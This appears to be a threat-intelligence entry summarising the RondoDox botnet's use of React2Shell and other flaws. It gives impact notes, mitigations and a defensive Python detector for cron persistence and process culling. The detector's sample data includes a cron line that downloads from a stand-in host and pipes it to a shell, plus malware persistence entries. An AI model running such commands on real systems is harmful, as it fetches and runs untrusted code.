RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers
Cybersecurity researchers have disclosed details of a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector, CloudSEK said in an
AI Analysis
Technical Summary
RondoDox is a sophisticated botnet campaign active since early 2025 that targets Internet of Things (IoT) devices and web applications by exploiting multiple vulnerabilities, most notably the critical React2Shell flaw (CVE-2025-55182) in React Server Components and Next.js, which allows unauthenticated remote code execution. The vulnerability has a CVSS score of 10.0, indicating its critical severity. The campaign progressed through three phases: initial reconnaissance and manual scanning (March-April 2025), mass vulnerability probing of popular web platforms like WordPress, Drupal, and Struts2, and IoT devices such as Wavlink routers (April-June 2025), followed by large-scale automated exploitation (July-December 2025). The attackers scan for vulnerable Next.js servers and deploy multiple payloads including cryptocurrency miners, a Mirai botnet variant, and a botnet loader named "/nuts/bolts" that removes competing malware and establishes persistence via cron jobs. The loader continuously monitors running processes, killing any non-whitelisted ones approximately every 45 seconds to prevent reinfection by other malware. According to Shadowserver Foundation data, about 90,300 instances remain vulnerable globally, with 4,300 in Germany and 2,800 in France, making Europe a significant target region. The botnet's modular nature and use of multiple zero-day and N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, demonstrate the operators' evolving capabilities. The campaign's impact includes hijacking device resources for cryptomining, launching distributed denial-of-service (DDoS) attacks, and potentially compromising data confidentiality and integrity. The threat actors' ability to maintain persistence and remove competing malware increases the difficulty of remediation.
CloudSEK and other cybersecurity firms recommend immediate patching of Next.js, segmentation of IoT devices into dedicated VLANs, deployment of Web Application Firewalls (WAFs), monitoring for suspicious process execution, and blocking known command-and-control servers to mitigate the threat.
Potential Impact
European organizations face significant risks from the RondoDox botnet due to the widespread use of vulnerable Next.js servers and IoT devices. The exploitation can lead to unauthorized remote code execution, enabling attackers to deploy cryptocurrency miners that consume computational resources, degrade system performance, and increase operational costs. The presence of Mirai botnet variants raises the risk of large-scale DDoS attacks originating from compromised devices, potentially disrupting critical services and infrastructure. The botnet's capability to remove competing malware and maintain persistence complicates detection and remediation efforts, increasing the likelihood of prolonged compromise. Confidentiality may be impacted if attackers leverage access to exfiltrate sensitive data or pivot within networks. Integrity risks arise from unauthorized code execution and potential manipulation of web applications or IoT device configurations. Availability is threatened by resource exhaustion and potential service outages. The campaign's targeting of popular web platforms and IoT devices used in industrial, commercial, and public sectors in Europe elevates the strategic risk, particularly for organizations relying on Next.js-based applications and connected devices. The ongoing nature of the campaign and the presence of thousands of vulnerable instances in Germany and France underscore the urgency for European entities to act swiftly to mitigate exposure.
Mitigation Recommendations
1. Immediately update all Next.js installations to the latest patched versions that address CVE-2025-55182 to eliminate the primary attack vector.
2. Conduct comprehensive asset inventories to identify all IoT devices and web servers running vulnerable software, prioritizing those exposed to the internet.
3. Segment IoT devices into dedicated VLANs with strict access controls to limit lateral movement and contain potential infections.
4. Deploy and fine-tune Web Application Firewalls (WAFs) to detect and block exploitation attempts targeting React2Shell and related vulnerabilities.
5. Implement continuous monitoring of process execution on critical servers and IoT devices to detect and alert on suspicious activities such as unauthorized process termination or new cron jobs.
6. Block known command-and-control (C2) infrastructure associated with RondoDox using threat intelligence feeds and network-level controls.
7. Remove any detected instances of competing malware and residual artifacts from prior infections to prevent persistence mechanisms from remaining active.
8. Harden IoT device configurations by disabling unnecessary services, changing default credentials, and applying vendor security updates.
9. Conduct regular penetration testing and vulnerability scanning focused on web applications and IoT environments to proactively identify and remediate weaknesses.
10. Educate IT and security teams on the specific indicators of compromise related to RondoDox to improve detection and response capabilities.
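The two host-level behaviours the summary attributes to the "/nuts/bolts" loader (persistence through cron entries, and killing non-whitelisted processes roughly every 45 seconds) map directly onto recommendation 5 above. The script below is an added example written for this page, not CloudSEK's or any vendor's tooling: it runs two simple detectors over constructed inputs, a crontab listing and a kill-event log in a made-up `key=value` format. The allowlist of cron command prefixes, the log field names, the sample paths other than "/nuts/bolts" and the thresholds are assumptions chosen for the illustration; a real deployment would feed it auditd or EDR process events and tune the allowlist to the host.

```python
"""Defender-side checks for two RondoDox-style behaviours described in the summary:
(1) cron persistence using commands outside an allowlist, and
(2) a single process killing many others within a short window (process culling).

All inputs below are constructed samples; the log format is invented for this example.
"""
import re
from collections import defaultdict

# Assumed allowlist of where legitimate cron commands live on this host.
CRON_ALLOWED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/local/bin/", "/etc/cron.")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash)\b")

# Constructed crontab listing: two benign lines plus three persistence-style entries.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update",
    "*/5 * * * * /usr/local/bin/backup.sh",
    "@reboot /nuts/bolts",                       # loader path named in the report
    "* * * * * /tmp/.x/miner --quiet",           # constructed example path
    "*/10 * * * * curl -s http://example.invalid/x | sh",  # constructed download-and-run
]

# Constructed kill-event log (invented format): pid 412 kills three processes,
# then three more ~45 s later; pid 200 performs one ordinary SIGTERM.
SAMPLE_KILL_LOG = [
    "ts=1000 pid=412 comm=bolts syscall=kill target_pid=900 sig=9",
    "ts=1001 pid=412 comm=bolts syscall=kill target_pid=901 sig=9",
    "ts=1002 pid=412 comm=bolts syscall=kill target_pid=902 sig=9",
    "ts=1010 pid=200 comm=systemd syscall=kill target_pid=777 sig=15",
    "ts=1045 pid=412 comm=bolts syscall=kill target_pid=903 sig=9",
    "ts=1046 pid=412 comm=bolts syscall=kill target_pid=904 sig=9",
    "ts=1047 pid=412 comm=bolts syscall=kill target_pid=905 sig=9",
]

KILL_RE = re.compile(
    r"ts=(?P<ts>\d+) pid=(?P<pid>\d+) comm=(?P<comm>\S+) syscall=kill "
    r"target_pid=(?P<target>\d+) sig=(?P<sig>\d+)"
)


def suspicious_cron_entries(crontab_lines, allowed_prefixes=CRON_ALLOWED_PREFIXES):
    """Return [(line, reason)] for cron entries whose command is outside the
    allowlisted paths or pipes downloaded content into a shell."""
    flagged = []
    for raw in crontab_lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" style entries have one schedule token; normal ones have five.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(parts) < (2 if line.startswith("@") else 6):
            continue
        command = parts[-1]
        first = command.split()[0]
        if first.startswith("/") and not first.startswith(allowed_prefixes):
            flagged.append((line, "command outside allowlisted paths"))
        elif PIPE_TO_SHELL.search(command):
            flagged.append((line, "pipes output into a shell"))
    return flagged


def process_culling_sources(log_lines, window_s=60, min_kills=3):
    """Return {pid: (comm, max_kills_in_window)} for processes that sent at least
    min_kills SIGKILL/SIGTERM signals within any window_s-second window."""
    stamps_by_pid = defaultdict(list)
    comm_of = {}
    for line in log_lines:
        m = KILL_RE.search(line)
        if not m or m["sig"] not in ("9", "15"):
            continue
        pid = int(m["pid"])
        stamps_by_pid[pid].append(int(m["ts"]))
        comm_of[pid] = m["comm"]

    flagged = {}
    for pid, stamps in stamps_by_pid.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_kills:
            flagged[pid] = (comm_of[pid], best)
    return flagged


if __name__ == "__main__":
    for line, reason in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron: {reason}: {line}")
    for pid, (comm, n) in process_culling_sources(SAMPLE_KILL_LOG).items():
        print(f"kill: pid {pid} ({comm}) sent {n} kill signals within one window")
```

The cron check is deliberately allowlist-based rather than keyed on the "/nuts/bolts" name, because a loader can be renamed trivially while a cron command living outside the host's package-managed paths is a durable signal. The kill detector uses a sliding window so that the reported 45-second cull cadence is caught by a window of about a minute without alerting on a single administrative `kill`.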
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain
Technical Details
- Article Source: https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html (fetched 2026-01-01T22:42:54.110Z, 993 words)
Threat ID: 6956f86fdb813ff03e871359
Added to database: 1/1/2026, 10:42:55 PM
Last enriched: 1/1/2026, 10:43:23 PM
Last updated: 1/9/2026, 4:06:03 AM